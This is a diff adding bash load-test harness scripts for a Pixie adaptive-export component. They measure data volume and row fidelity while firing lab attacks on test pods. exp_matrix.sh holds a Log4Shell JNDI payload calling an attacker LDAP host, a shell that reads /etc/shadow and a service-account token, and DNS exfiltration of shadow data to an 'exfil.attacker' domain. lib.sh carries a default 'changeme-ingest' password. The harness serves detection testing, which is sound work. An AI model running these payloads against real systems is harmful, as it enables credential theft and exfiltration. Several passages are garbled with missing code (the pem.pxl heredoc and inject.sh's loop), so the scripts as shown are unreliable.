+[[ "$MODE" == "data" && -n "$GEN" ]] && del_gen "$GEN"
+log "E8 done -> $OUT"
+# Summary: did it ever stall, and at which tick? (MODE is passed with -v rather than spliced into the awk program text.)
+awk -F, -v mode="$MODE" 'NR>1{tot++; if($9=="STALL")stall++} END{printf "[aeload] E8 %s: %d ticks, %d STALL ticks (%s)\n", mode, tot, stall+0, (stall+0==0?"sustained-OK":"STALLED — reproduces writes-stop")}' "$OUT"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh
new file mode 100755
index 00000000000..de8a068713a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh
@@ -0,0 +1,126 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_matrix.sh — data-volume reduction MATRIX, runs node-side on the rig.
+# CONDITIONS = space-list of ATTACK:NOISE (ATTACK=log4shell|argocd|react2argo, NOISE=off|on)
+# For each condition: ALL arm (passthrough firehose) then DX arm (streaming), REPS each,
+# 2-min window, single fire at t=60s, truncate all CH + settle between reps, measure every
+# forensic_db table. Pre-flight AE guard + per-rep attack-fired (R0001) acceptance gate.
+# Skips conditions whose workload isn't deployed (logs SKIP) so it does what it can now.
+set -uo pipefail
+CONDS=${CONDITIONS:-"log4shell:off log4shell:on argocd:off argocd:on react2argo:off react2argo:on"}
+REPS=${REPS:-5}; RUNSEC=${RUNSEC:-120}; FIREAT=${FIREAT:-60}; GAP=${GAP:-180} # defaults match the header (2-min window, fire at t=60s); GAP is presumably the between-rep settle in seconds — confirm in the main loop
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+OUT=/tmp/matrix.txt; RES=/tmp/matrix.tsv # OUT: human-readable log (say/measure tee into it); RES: TSV rows appended by measure
+: > "$OUT"; : > "$RES" # start both output files empty
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } # run one SQL statement ($1) via clickhouse-client inside $CHPOD; stderr is discarded
+say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; } # UTC-timestamped log line to stdout, also appended to $OUT
+TABLES=$(chq "SELECT name FROM system.tables WHERE database='forensic_db' AND engine LIKE '%MergeTree%' FORMAT TSV") # table list is captured once, at script start
+truncate_all(){ local t; for t in $TABLES; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; } # truncate every table captured in $TABLES; per-table errors are ignored
+ensure_healthy(){ local p; p=$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null) # read the current vizier phase
+ if [ "$p" != Healthy ]; then kubectl -n pl delete pod -l name=vizier-query-broker >/dev/null 2>&1 # not Healthy: delete the query-broker pod(s)
+ for _ in $(seq 1 20); do [ "$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null)" = Healthy ] && break; sleep 4; done; fi # then poll up to 20 times, 4s apart
+ kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null; } # always print the final phase for the caller to inspect
+ae_ok(){ kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null | awk '{n++} $3!="Running"{bad++} END{exit !(n>0 && bad+0==0)}'; } # true only when at least one AE pod is listed AND every listed pod is Running (no pods / kubectl failure → false)
+
+# ---- noise (volproof loadgen): "on" applies /tmp/loadgen.yaml and waits up to 120s for the rollout; any other value deletes the deploy ----
+noise(){ if [ "$1" = on ]; then kubectl apply -f /tmp/loadgen.yaml >/dev/null 2>&1; kubectl -n $NS rollout status deploy/volproof-loadgen --timeout=120s >/dev/null 2>&1; say " noise ON (volproof-loadgen)";
+ else kubectl -n $NS delete deploy volproof-loadgen --ignore-not-found --wait=false >/dev/null 2>&1; say " noise OFF"; fi; }
+
+# ---- per-attack workload readiness + fire + R0001 gate ----
+ATTACK="" # set per condition before ready/fire are called
+ready(){ case "$ATTACK" in # exit status 0 ⇔ the workload for $ATTACK is deployed
+ log4shell) kubectl -n $NS get pods --no-headers 2>/dev/null | grep -q '^backend' ;;
+ argocd) kubectl get ns argocd >/dev/null 2>&1 && kubectl -n argocd get application probe-app >/dev/null 2>&1 ;;
+ react2argo) kubectl get ns react >/dev/null 2>&1 || kubectl -n default get deploy react >/dev/null 2>&1 ;;
+ *) false ;; esac; } # an unknown ATTACK is never "ready" (previously fell through and returned 0)
+fire(){ case "$ATTACK" in # launch the attack selected by $ATTACK; output is discarded and most steps are best-effort (|| true)
+ log4shell)
+ local BIP BPORT BP; BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m5 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null | awk '/^backend/{print $1;exit}')
+ [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; id; cat /etc/shadow 2>/dev/null|head -2; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null|head -c20; D=$(cat /etc/shadow 2>/dev/null|tr -dc "a-z0-9"|head -c90); i=0; while [ $i -lt 5 ]; do C=$(echo "$D"|cut -c$((i*18+1))-$((i*18+18))); getent hosts "x${C}.exfil.attacker.attacker-ns.svc.cluster.local" >/dev/null 2>&1; i=$((i+1)); done' >/dev/null 2>&1 || true ;;
+ argocd)
+ kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true; sleep 25 # pause 25s between the two hard refreshes
+ kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true ;;
+ react2argo)
+ # (1) react RCE -> steals SA token -> POSTs the malicious argocd Application
+ # `sys-housekeeping` (sealed trigger, applied verbatim).
+ kubectl delete job react2shell-trigger -n default --ignore-not-found >/dev/null 2>&1
+ kubectl apply -f /tmp/react2argo-trigger.yaml >/dev/null 2>&1 || true
+ # (2) cache-bust so the render-exec re-fires this rep. The payload is a
+ # render-exec: argocd-repo-server runs `kustomize build --enable-exec` ->
+ # ./mal.sh -> reads /etc/shadow (R0001 + R0010 on repo-server) at RENDER
+ # time. argocd caches rendered manifests in argocd-REDIS; a repo-server
+ # restart does NOT clear it (verified). Restart argocd-redis to flush the
+ # manifest cache, then one soft (cache-respecting) reconcile nudge so the
+ # render re-fires within the rep window. (RCA 2026-06-19.)
+ kubectl -n argocd rollout restart deploy/argocd-redis >/dev/null 2>&1
+ kubectl -n argocd rollout status deploy/argocd-redis --timeout=60s >/dev/null 2>&1
+ kubectl -n argocd annotate application sys-housekeeping argocd.argoproj.io/refresh=normal --overwrite >/dev/null 2>&1 || true ;;
+ esac; }
+# acceptance gate: count of R0001 (unexpected process) rows in forensic_db.kubescape_logs
+# from the last 130s. The threshold is built as (unix seconds * 1e9), i.e. event_time is
+# compared as nanoseconds here.
+r0001_recent(){ chq "SELECT count() FROM forensic_db.kubescape_logs WHERE RuleID='R0001' AND event_time >= toUInt64((now()-130))*1000000000"; }
+
+# measure <cond> <arm> <rep> <valid> — snapshot forensic_db table sizes for one rep.
+# Prints a table/rows/bytes listing (also appended to $OUT) from the active parts in
+# system.parts, appends one TSV record per table (cond, arm, rep, table, rows, bytes)
+# to $RES, then logs the validity flag and the pods whose adaptive_attribution window
+# (t_end) is still in the future.
+measure(){ local cond=$1 arm=$2 rep=$3 valid=$4
+ printf " %-16s %10s %12s\n" table rows bytes | tee -a "$OUT"
+ # Skip blank lines; missing row/byte values are recorded as 0.
+ while IFS=$'\t' read -r t r b; do [ -z "$t" ] && continue
+ printf " %-16s %10d %12d\n" "$t" "${r:-0}" "${b:-0}" | tee -a "$OUT"
+ printf "%s\t%s\t%s\t%s\t%s\t%s\n" "$cond" "$arm" "$rep" "$t" "${r:-0}" "${b:-0}" >> "$RES"
+ done < <(chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active GROUP BY table ORDER BY table FORMAT TSV")
+ say " valid=$valid steered=$(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"; }
+
+run_arm(){ local cond=$1 arm=$2; shift 2
+ say "--- $cond ARM $arm : $* ---"
+ kubectl -n pl set env ds/adaptive-export "$@" >/dev/null 2>&1
+ kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1
+ # Wait for AE to actually be Running — `rollout status` can return during the
+ # restart race; retry before aborting so we don't false-abort a healthy roll.
+ local _i; for _i in 1 2 3 4 5 6 7 8 9; do ae_ok && break; sleep 10; done
+ if ! ae_ok; then say " ABORT-arm: AE not Running after rollout+90s wait:"; kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null|awk '{print " "$1,$3,$4}'|tee -a "$OUT"; return 1; fi
+ say " AE OK; vizier=$(ensure_healthy)"
+ local rep t0 g
+ for rep in $(seq 1 "$REPS"); do
+ say " $cond $arm rep$rep"; truncate_all; ensure_healthy >/dev/null
+ t0=$(date +%s); while [ $(( $(date +%s) - t0 )) -lt "$FIREAT" ]; do sleep 2; done
+ say " FIRE $ATTACK"; fire
+ while [ $(( $(date +%s) - t0 )) -lt "$RUNSEC" ]; do sleep 2; done; sleep 15
+ g=$(r0001_recent); g=${g:-0}; [ "$g" -gt 0 ] && valid=yes || valid="NO(r0001=0)"
+ measure "$cond" "$arm" "$rep" "$valid"
+ if [ "$rep" -lt "$REPS" ]; then say " settle ${GAP}s"; sleep "$GAP"; fi
+ done; return 0; }
+
+say "===== MATRIX START conds=[$CONDS] REPS=$REPS ====="
+for c in $CONDS; do
+ ATTACK=${c%%:*}; NZ=${c##*:}
+ say "===== CONDITION $ATTACK noise=$NZ ====="
+ if ! ready; then say " SKIP — $ATTACK workload not deployed"; continue; fi
+ noise "$NZ"; sleep 20
+ run_arm "$ATTACK/$NZ" ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60 || continue
+ say " inter-arm settle ${GAP}s"; sleep "$GAP"
+ run_arm "$ATTACK/$NZ" DX ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60 || continue
+ noise off
+ say " inter-condition settle ${GAP}s"; sleep "$GAP"
+done
+
+say "===== SUMMARY (mean rows over valid reps, per condition/arm) ====="
+for c in $CONDS; do for arm in ALL DX; do for t in http_events dns_events conn_stats pgsql_events; do
+ m=$(awk -F'\t' -v C="${c%%:*}/${c##*:}" -v A=$arm -v T=$t '$1==C&&$2==A&&$4==T{s+=$5;n++} END{if(n)printf "%.0f",s/n; else print 0}' "$RES")
+ [ "$m" != 0 ] && say " $c $arm $t mean_rows=$m"
+done; done; done
+say "===== MATRIX DONE ====="
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
new file mode 100755
index 00000000000..a755d783b72
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
@@ -0,0 +1,127 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_row_reconcile.sh — DETERMINISTIC row-level PEM↔CH reconciliation for AE.
+#
+# WHY: count(CH) >= count(PEM) ("write ⊇ read") is NOT proof — CH can be inflated by
+# re-pull dups (C8) while silently MISSING specific rows PEM has. This test proves
+# identity at ROW granularity: every individual row Pixie captured (PEM) was written
+# to forensic_db (CH) with matching values — no loss, no fabrication.
+#
+# HOW: Pixie protocol rows have no native UUID, so we MINT one. Each request carries a
+# unique probe id <TAG>-<i> in its URL → that string is the row's deterministic UUID,
+# visible in http_events.req_path on BOTH sides. We then compare the SET of (uuid|method|
+# status) fingerprints from PEM vs CH. This cleanly separates two layers:
+# expected (0..N-1) --Pixie capture--> PEM set --AE fidelity--> CH set
+# - expected \ PEM = Pixie/eBPF didn't capture it (Pixie property, NOT AE)
+# - PEM \ CH = AE LOST a row Pixie had (← the AE bug we hunt; must be empty)
+# - CH \ PEM = AE FABRICATED a row Pixie lacked (must be empty; dups are same uuid, not new)
+# - mismatched fingerprint for same uuid = value corruption (shows as both loss+fab)
+#
+# PASS ⇔ (PEM \ CH) empty AND (CH \ PEM) empty. Runs NODE-SIDE (kubectl + px local).
+# -u/pipefail only (no -e): a failing kubectl/px call does not stop the script.
+set -uo pipefail
+# Tunables, all overridable from the environment: request count, target namespace/service,
+# Pixie cluster id, ClickHouse pod name, settle time, and the output directory.
+N=${N:-300}; NS=${NS:-log4j-poc}; SVC=${SVC:-frontend}
+CLUSTER=${CLUSTER:-547d0a15-4004-435e-aea1-c13e596eb976}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+SETTLE=${SETTLE:-180} # > two passthrough sweeps (~80s each) + write
+O=/tmp/rowrec; mkdir -p "$O"
+# chq <sql> — run a query with clickhouse-client inside the ClickHouse pod; stderr is discarded.
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# pxrun relies on the persisted `px auth login` session (auth.json); PX_CLOUD_ADDR is non-secret.
+# pxrun <script.pxl> — run a PxL script against $CLUSTER and drop CLI banner/status lines
+# and blank lines from the merged stdout+stderr.
+pxrun(){ PX_CLOUD_ADDR="$(grep -E '^PX_CLOUD_ADDR=' /tmp/pixie-keys.env 2>/dev/null | cut -d= -f2-)"; export PX_CLOUD_ADDR
+ px run -f "$1" -c "$CLUSTER" 2>&1 | grep -ivE "PX_|ENV VARS|^\*|Pixie CLI|Cloud|^$|resump"; }
+
+# Resolve the frontend Service ClusterIP and the "<namespace>/<pod>" name of its pod.
+FE=$(kubectl -n "$NS" get svc "$SVC" -o jsonpath='{.spec.clusterIP}')
+FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods -l app="$SVC" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)"
+# Fallback when no pod carries the app=$SVC label: first pod whose name starts with $SVC.
+[ "$FEPOD_NSP" = "$NS/" ] && FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods --no-headers 2>/dev/null | awk '/^'"$SVC"'/{print $1; exit}')"
+TAG="rr$(date +%s)" # unique run tag → isolates THIS run's rows (clock-skew-proof)
+echo "TAG=$TAG N=$N target=$FEPOD_NSP fe=$FE" | tee "$O/meta.txt"
+
+# 0. Put AE in passthrough so it captures the frontend (write-fidelity test, not gating).
+kubectl -n pl set env ds/adaptive-export ADAPTIVE_PASSTHROUGH=true ADAPTIVE_PASSTHROUGH_WINDOW_SEC=240 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=20 ADAPTIVE_PUSH_PIXIE_ROWS=false >/dev/null 2>&1
+kubectl -n pl rollout status ds/adaptive-export --timeout=140s >/dev/null 2>&1
+sleep 40 # AE reconnect warm
+
+# 1. Fire N uniquely-tagged requests from a gen pod (gen client may be untraced; we read
+# the TRACED frontend SERVER-side, so every request shows up as one http_events row).
+# Any previous rowgen pod is removed first; the new one prints ROWGEN_DONE after the
+# last request and then sleeps so its logs stay readable.
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=true >/dev/null 2>&1
+kubectl -n "$NS" run rowgen --image=busybox:1.36 --restart=Never --command -- \
+ sh -c "for i in \$(seq 0 $((N-1))); do wget -qO- 'http://$FE/api/products?probe=$TAG-'\$i >/dev/null 2>&1; done; echo ROWGEN_DONE; sleep 3600"
+# Poll the pod log for the sentinel for up to 90 x 2s.
+# NOTE(review): if the sentinel never appears the script continues anyway and still
+# reports "fired $N requests" — confirm that is intended.
+for _ in $(seq 1 90); do kubectl -n "$NS" logs rowgen 2>/dev/null | grep -q ROWGEN_DONE && break; sleep 2; done
+echo "fired $N requests; settling ${SETTLE}s for AE to sweep+write" | tee -a "$O/meta.txt"
+sleep "$SETTLE"
+
+# 2. PEM fingerprints: (uuid|method|status) Pixie captured for the frontend, filtered by TAG.
+cat > "$O/pem.pxl" < "$O/pem.raw"
+# Build fingerprint uuid|method|status; req_path carries the uuid, no spaces in any field.
+awk -v tag="$TAG" '
+ { for(i=1;i<=NF;i++){ if($i ~ tag"-[0-9]+"){ uuid=$i; sub(/^.*(/tag"-[0-9]+/).*/,"",uuid) } } }' /dev/null 2>/dev/null
+grep -oE "$TAG-[0-9]+" "$O/pem.raw" | sort -u > "$O/pem.uuids"
+# fingerprint with method+status (parse columns around the probe token)
+# Output is piped through `sort -u` so pem.fp is ordered with the same collation as
+# ch.fp (also built with `sort -u`); `comm` in the reconcile step needs both inputs
+# sorted the same way.
+python3 - "$O/pem.raw" "$TAG" <<'PY' | sort -u > "$O/pem.fp"
+import sys,re
+tag=sys.argv[2]
+seen=set()
+for ln in open(sys.argv[1]):
+ m=re.search(re.escape(tag)+r"-(\d+)",ln)
+ if not m: continue
+ # Look for method/status OUTSIDE the probe token: probe indices 100-599 would
+ # otherwise satisfy the 3-digit status regex and be reported as the status.
+ # NOTE(review): any other standalone 3-digit number earlier in the row can still
+ # be picked up as the status — confirm against the PxL column order.
+ rest=ln[:m.start()]+" "+ln[m.end():]
+ meth="GET" if "GET" in rest else "?"
+ st=re.search(r"\b([1-5]\d\d)\b",rest); st=st.group(1) if st else "?"
+ seen.add(f"{tag}-{m.group(1)}|{meth}|{st}")
+# Print nothing when no row matched, so an empty capture is not counted as one blank fingerprint.
+if seen: print("\n".join(seen))
+PY
+
+# 3. CH fingerprints: what AE actually wrote (distinct, dedup'd) for the same TAG.
+# Each fingerprint is "<TAG>-<i>|<req_method>|<resp_status>", restricted to the frontend pod.
+chq "SELECT DISTINCT concat(extract(req_path,'($TAG-[0-9]+)'),'|',req_method,'|',toString(resp_status))
+ FROM forensic_db.http_events
+ WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'
+ ORDER BY 1 FORMAT TSV" 2>/dev/null | grep -E "$TAG-[0-9]+\|" | sort -u > "$O/ch.fp"
+grep -oE "$TAG-[0-9]+" "$O/ch.fp" | sort -u > "$O/ch.uuids"
+# Total (non-distinct) CH rows for this TAG; used for the dup factor.
+CH_TOTAL=$(chq "SELECT count() FROM forensic_db.http_events WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'")
+
+# 4. Reconcile.
+seq 0 $((N-1)) | sed "s/^/$TAG-/" | sort -u > "$O/expected.uuids"
+LOSS=$(comm -23 "$O/pem.fp" "$O/ch.fp" | wc -l) # in PEM not CH = AE LOST (must be 0)
+FAB=$(comm -13 "$O/pem.fp" "$O/ch.fp" | wc -l) # in CH not PEM = AE FABRICATED/value-mismatch (must be 0)
+MATCH=$(comm -12 "$O/pem.fp" "$O/ch.fp" | wc -l)
+PIXIE_MISS=$(comm -23 "$O/expected.uuids" "$O/pem.uuids" | wc -l) # Pixie didn't capture (NOT AE)
+PEM_U=$(wc -l < "$O/pem.uuids"); CH_U=$(wc -l < "$O/ch.uuids")
+DUP="n/a"; [ "$CH_U" -gt 0 ] && DUP=$(awk "BEGIN{printf \"%.2f\", $CH_TOTAL/$CH_U}")
+
+# 5. Report: print the reconcile numbers and the verdict, mirrored into $O/RESULT.txt.
+{
+echo "================ ROW-LEVEL RECONCILE (TAG=$TAG, N=$N) ================"
+echo "Pixie captured (PEM distinct uuids): $PEM_U / $N (expected\\PEM = $PIXIE_MISS not captured by eBPF)"
+echo "AE wrote (CH distinct uuids): $CH_U (CH total rows=$CH_TOTAL → dup factor ${DUP}x)"
+echo "fingerprint matched (uuid|method|status): $MATCH"
+echo "AE LOSS (PEM\\CH, MUST be 0): $LOSS"
+echo "AE FAB (CH\\PEM, MUST be 0): $FAB"
+# Show up to 20 offending fingerprints for each non-empty difference.
+[ "$LOSS" -gt 0 ] && { echo '--- LOST rows (Pixie had, AE did NOT write): ---'; comm -23 "$O/pem.fp" "$O/ch.fp" | head -20; }
+[ "$FAB" -gt 0 ] && { echo '--- FABRICATED/mismatched rows (in CH, not in PEM): ---'; comm -13 "$O/pem.fp" "$O/ch.fp" | head -20; }
+# PASS additionally requires that Pixie captured at least one uuid, so an empty
+# capture cannot pass vacuously.
+if [ "$LOSS" -eq 0 ] && [ "$FAB" -eq 0 ] && [ "$PEM_U" -gt 0 ]; then
+ echo "VERDICT: PASS — every row Pixie captured was written to CH with matching values."
+else
+ echo "VERDICT: FAIL — AE write-set != Pixie read-set at row granularity."
+fi
+} | tee "$O/RESULT.txt"
+# Cleanup: remove the generator pod without waiting for deletion to finish.
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=false >/dev/null 2>&1
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/inject.sh b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
new file mode 100755
index 00000000000..df6de5219c1
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
@@ -0,0 +1,109 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# inject.sh — inject controlled kubescape_logs trigger rows into ClickHouse over
+# the HTTP interface, with EXACT control over event_time. This is the only AE
+# input under test: real kubescape is NOT deployed for these load-tests.
+#
+# Row shape mirrors exactly what Vector emits (and what AE's trigger polls):
+# BaseRuntimeMetadata, CloudMetadata, RuleID, RuntimeK8sDetails (JSON string
+# with podName/podNamespace), RuntimeProcessDetails (JSON string with
+# processTree.pid/comm), event, event_time (UInt64 unix SECONDS — see below), hostname.
+#
+# anomaly_hash = SHA256(pid, comm, pod, namespace)[:16] is computed by AE — NOT
+# set here — so per-rep uniqueness comes from a unique --pod (data plane) and a
+# unique --hostname (control plane; trigger_watermark is partitioned by host).
+#
+# Timestamp discipline (PRODUCTION UNIT = SECONDS):
+# event_time is unix SECONDS — the unit the soc Vector kubescape sink emits
+# (`to_unix_timestamp(ts)`, VRL default seconds) and what the CH DDL's
+# `toDateTime(event_time)` TTL/PARTITION assume. (The AE trigger auto-detects
+# s/ms/ns, but the DDL only handles seconds — so fixtures MUST be seconds or
+# the rows are TTL-deleted; see FINDINGS_AND_BACKLOG.md F1/AE-2.)
+# --event-time is the FIRST row's event_time (unix SECONDS). With --count N>1
+# the rows get event_time, event_time+dt, ... (--dt-s, default 1s) so they are
+# DISTINCT + monotone and never collide at the watermark boundary — UNLESS
+# --same-time is given, which deliberately reuses one event_time to exercise
+# the boundary-fingerprint dedup (experiment E4).
+set -euo pipefail
+
+ENDPOINT="${CH_ENDPOINT:-http://localhost:8123}"
+CH_USER="${CH_USER:-}"
+CH_PASS="${CH_PASS:-}"
+NS="" ; POD="" ; RULE="R0001" ; PID="1234" ; COMM="java"
+EVENT_TIME="" ; HOSTNAME_="" ; COUNT=1 ; DT_S=1 ; SAME_TIME=0
+ALERT=""
+
+usage(){ grep '^#' "$0" | sed 's/^# \{0,1\}//' ; exit "${1:-0}"; }
+
+# Flag parsing. Every flag except --same-time and -h/--help consumes one value;
+# an unknown flag prints the usage text and exits 1.
+while [[ $# -gt 0 ]]; do
+ case "$1" in
+ --endpoint) ENDPOINT="$2"; shift 2;;
+ --user) CH_USER="$2"; shift 2;;
+ --pass) CH_PASS="$2"; shift 2;;
+ --ns) NS="$2"; shift 2;;
+ --pod) POD="$2"; shift 2;;
+ --rule) RULE="$2"; shift 2;;
+ --pid) PID="$2"; shift 2;;
+ --comm) COMM="$2"; shift 2;;
+ --event-time) EVENT_TIME="$2"; shift 2;;
+ --hostname) HOSTNAME_="$2"; shift 2;;
+ --count) COUNT="$2"; shift 2;;
+ --dt-s) DT_S="$2"; shift 2;;
+ --same-time) SAME_TIME=1; shift;;
+ --alert) ALERT="$2"; shift 2;;
+ -h|--help) usage 0;;
+ *) echo "inject.sh: unknown arg $1" >&2; usage 1;;
+ esac
+done
+
+[[ -n "$NS" && -n "$POD" && -n "$EVENT_TIME" && -n "$HOSTNAME_" ]] || {
+ echo "inject.sh: --ns --pod --event-time --hostname are required" >&2; exit 2; }
+[[ -n "$ALERT" ]] || ALERT="$RULE"
+
+# Build the JSONEachRow body. RuntimeK8sDetails / RuntimeProcessDetails are
+# JSON-STRING columns, so their inner quotes are escaped (\"). event_time is
+# unix SECONDS; --count rows step by DT_S seconds (distinct, monotone).
+body=""
+for ((i=0; i&2
+ cat /tmp/inject_resp.$$ >&2 || true
+ rm -f /tmp/inject_resp.$$
+ exit 1
+fi
+rm -f /tmp/inject_resp.$$
+echo "inject.sh: OK count=${COUNT} ns=${NS} pod=${POD} rule=${RULE} host=${HOSTNAME_} t0=${EVENT_TIME} same_time=${SAME_TIME}"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/lib.sh b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh
new file mode 100755
index 00000000000..680b694975a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh
@@ -0,0 +1,216 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# lib.sh — shared helpers for the AE fixture-isolation load-tests (L3, live rig).
+#
+# Connectivity model (per the labctl-session-discipline rule): all kubectl runs
+# LOCALLY over the tailscale-direct kubeconfig (make kubeconfig), and ClickHouse
+# is reached over a local port-forward — NO long-held labctl ssh sessions.
+#
+# Required env (export before sourcing or pass through):
+# KUBECONFIG tailscale-direct kubeconfig for the rig (make kubeconfig)
+# AELOAD_IMAGE ttl.sh/aeload-<id>:24h (built on the PG dev-machine)
+# Optional:
+# CH_NS (default clickhouse), AE_NS (default pl), AELOAD_NS (default aeload)
+# CH_HTTP (default http://127.0.0.1:8123 via the port-forward this lib opens)
+# CH_RO_USER / CH_RO_PASS (SELECT creds; default = empty → default user)
+# CH_RW_USER / CH_RW_PASS (INSERT creds; default ingest_writer/changeme-ingest)
+set -uo pipefail
+
+CH_NS="${CH_NS:-clickhouse}"
+AE_NS="${AE_NS:-pl}"
+AELOAD_NS="${AELOAD_NS:-aeload}"
+CH_HTTP="${CH_HTTP:-http://127.0.0.1:8123}"
+CH_RO_USER="${CH_RO_USER:-}"
+CH_RO_PASS="${CH_RO_PASS:-}"
+CH_RW_USER="${CH_RW_USER:-ingest_writer}"
+CH_RW_PASS="${CH_RW_PASS:-changeme-ingest}"
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+K8S_DIR="$(cd "$HERE/../k8s" && pwd)"
+
+_PF_PID=""
+
+die(){ echo "[aeload] FATAL: $*" >&2; exit 1; }
+log(){ echo "[aeload] $*" >&2; }
+
+# k — kubectl over the tailscale kubeconfig.
+k(){ kubectl "$@"; }
+
+# ch_svc — resolve the ClickHouse service name (first svc exposing 8123).
+# Lists "<name> <ports...>" for every Service in $CH_NS and prints the name from the
+# first line containing 8123. The awk match is against the whole line, so a service
+# NAME containing 8123 would match too.
+ch_svc(){
+ k -n "$CH_NS" get svc -o jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.ports[*].port}{"\n"}{end}' \
+ | awk '/8123/{print $1; exit}'
+}
+
+# ch_portforward_up — start a background port-forward 8123 -> CH HTTP.
+# Set CH_NO_PF=1 when running LAB-SIDE (on the PG dev-machine): there kubectl is
+# native and ClickHouse is reachable in-cluster, so point CH_HTTP straight at the
+# service (e.g. http://<svc>.<ns>.svc:8123) and skip the forward entirely. This
+# is the disciplined path — no long-held labctl ssh / no tailnet dependency.
